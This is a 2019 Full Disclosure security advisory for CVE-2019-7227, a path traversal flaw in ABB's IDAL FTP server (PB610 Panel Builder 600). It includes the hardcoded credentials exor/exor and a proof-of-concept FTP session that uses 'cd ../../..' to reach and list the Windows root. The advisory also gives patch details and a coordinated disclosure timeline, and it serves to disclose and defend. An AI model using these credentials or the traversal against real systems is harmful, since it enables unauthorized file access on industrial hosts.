[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
From: xen1thLabs <xen1thLabs () darkmatter ! ae>
Date: 2019-06-20 12:12:16
Message-ID: 424c3cc52ee84d35b8b31e2eda03fb31 () darkmatter ! ae
[Download RAW message or body]
XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
========================================================================
Identifiers
-----------
XL-19-008
CVE-2019-7227
ABBVU-IAMF-1902006
CVSS Score
----------
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
Affected vendor
---------------
ABB (new.abb.com)
Credit
------
Eldar Marcussen - xen1thLabs - Software Labs
Vulnerability summary
---------------------
The IDAL FTP server fails to ensure that directory change requests do not change to locations \
outside of the FTP servers root directory. An authenticated attacker can simply traverse \
outside the server root directory by changing the directory with "cd ..".
Technical details
-----------------
An authenticated attacker can traverse to arbitrary directories on the hard disk and then use \
the FTP server functionality to download and upload files. An unauthenticated attacker can take \
advantage of the hardcoded or default credential pair exor/exor to become an authenticated \
attacker.
Proof of concept
----------------
```
ftp> open localhost 22
Connected to WIN-542AQUCL4LD.
220 Welcome to IDAL FTP server. READY.
User (WIN-542AQUCL4LD:(none)): exor
331 User name ok, need password.
Password:
230 User successfully logged in.
550 CWD command failed. Directory not found.
ftp> cd ../../../../../../../../../../../../../../../
250 CWD command successful.
ftp> dir
200 PORT command successful.ac
150 Opening ASCII mode data connection for LIST.
drwxrwxrwx 1 0 0 0 Dec 11 05:45 $Recycle.Bin
-rwxrwxrwx 1 0 0 24 Jun 10 2009 autoexec.bat
drwxrwxrwx 1 0 0 0 Dec 11 16:41 Boot
-r--r--r-- 1 0 0 383562 Jul 14 2009 bootmgr
-r--r--r-- 1 0 0 8192 Dec 11 16:41 BOOTSECT.BAK
-rw-rw-rw- 1 0 0 10 Jun 10 2009 config.sys
drwxrwxrwx 1 0 0 0 Jul 14 2009 Documents and Settings
-rw-rw-rw- 1 0 0 -1074274304 Dec 11 12:36 pagefile.sys
drwxrwxrwx 1 0 0 0 Jul 14 2009 PerfLogs
dr-xr-xr-x 1 0 0 0 Dec 11 11:42 Program Files
drwxrwxrwx 1 0 0 0 Dec 11 12:36 ProgramData
drwxrwxrwx 1 0 0 0 Dec 11 05:44 Recovery
-rw-rw-rw- 1 0 0 213 Dec 11 07:23 setup.log
drwxrwxrwx 1 0 0 0 Dec 11 12:26 System Volume Information
dr-xr-xr-x 1 0 0 0 Dec 11 05:44 Users
drwxrwxrwx 1 0 0 0 Dec 11 07:20 Windows
226 Transfer complete.
ftp: 1009 bytes received in 0.01Seconds 100.90Kbytes/sec.
ftp>
```
Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367
Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic